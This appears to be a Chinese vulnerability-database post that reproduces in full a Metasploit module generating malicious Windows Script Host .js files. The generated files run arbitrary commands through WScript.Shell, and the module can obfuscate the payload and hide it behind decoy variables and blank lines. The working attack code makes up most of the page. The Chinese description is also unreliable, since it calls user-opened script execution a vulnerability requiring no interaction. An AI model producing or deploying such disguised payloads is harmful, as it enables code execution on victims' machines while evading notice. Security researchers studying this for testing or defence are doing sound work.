Windows Script Host JScript 恶意文件漏洞

漏洞信息

漏洞名称: Windows Script Host JScript 恶意文件漏洞

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: Windows Script Host (WSH) 是微软Windows操作系统中的一个组件,它允许用户在Windows环境中运行脚本,如JScript和VBScript。WSH广泛应用于自动化任务和脚本执行,是企业级和个人用户常用的脚本执行环境。该漏洞存在于WSH的JScript处理中,攻击者可以通过构造恶意的.js文件,利用WSH执行任意命令。这种漏洞的技术根源在于WSH对JScript文件的处理不当,未能有效验证和限制脚本中的命令执行。攻击者可以利用此漏洞在受害者的系统上执行任意代码,可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用不需要用户交互,只需用户打开恶意的.js文件即可触发,因此具有较高的自动化利用潜力。由于WSH是Windows系统的内置组件,且广泛用于各种脚本任务,此漏洞的影响范围广泛,危害性较大。

产品厂商: Microsoft

产品名称: Windows Script Host

影响版本: Windows 98 或更新版本

来源: https://github.com/rapid7/metasploit-framework/blob/de10d0d6ee52a268b992d4d0647eeebb673b69a6/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_script_host_jscript.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/exploitation/jsobfu'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Script Host JScript (.js) File',
        'Description' => %q{
          This module creates a Windows Script Host (WSH) JScript (.js) file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 98 or newer', {}
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1998-06-25', # Windows 98 release date
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The JScript file name.', 'msf.js']),
      OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
    ])

    register_advanced_options([
      OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious JScript.', 100]),
    ])
  end

  def generate_jscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
    js = ''

    # TODO: This could be improved by generating more realistic looking
    # benign code with functions and flow control
    if prepend_benign_code
      rand(5..10).times do
        js << "var #{rand_text_alpha(6..16)}=\"#{rand_text_alphanumeric(6..16)}\";\r\n"
      end
    end

    js << "\r\n" * prepend_new_lines

    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    #       the specified ARCH_CMD payload is a string of commands
    #       (not a single command).
    if escaped_payload.include?(' & ')
      cmd = "cmd.exe /c #{escaped_payload}"
    else
      cmd = escaped_payload
    end

    shell_var = rand_text_alpha(6..16)
    js_payload = "var #{shell_var} = new ActiveXObject(\"WScript.Shell\");"
    js_payload << "#{shell_var}.Run(\"#{cmd}\");"

    if obfuscate
      js_obfu = Rex::Exploitation::JSObfu.new(js_payload)
      obfuscated_payload = js_obfu.obfuscate(memory_sensitive: false).to_s
      # WSH JScript execution context does not support 'window' object
      obfuscated_payload = obfuscated_payload.gsub('window[', 'String[')
      js << obfuscated_payload
    else
      js << js_payload
    end

    js
  end

  def exploit
    js = generate_jscript(
      payload.encoded,
      prepend_benign_code: datastore['PrependBenignCode'],
      prepend_new_lines: datastore['PrependNewLines'],
      obfuscate: datastore['OBFUSCATE']
    )
    file_create(js)
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Windows Script Host JScript 恶意文件漏洞
http://example.com/2025/07/25/github_1487953567/
作者
lianccc
发布于
2025年7月25日
许可协议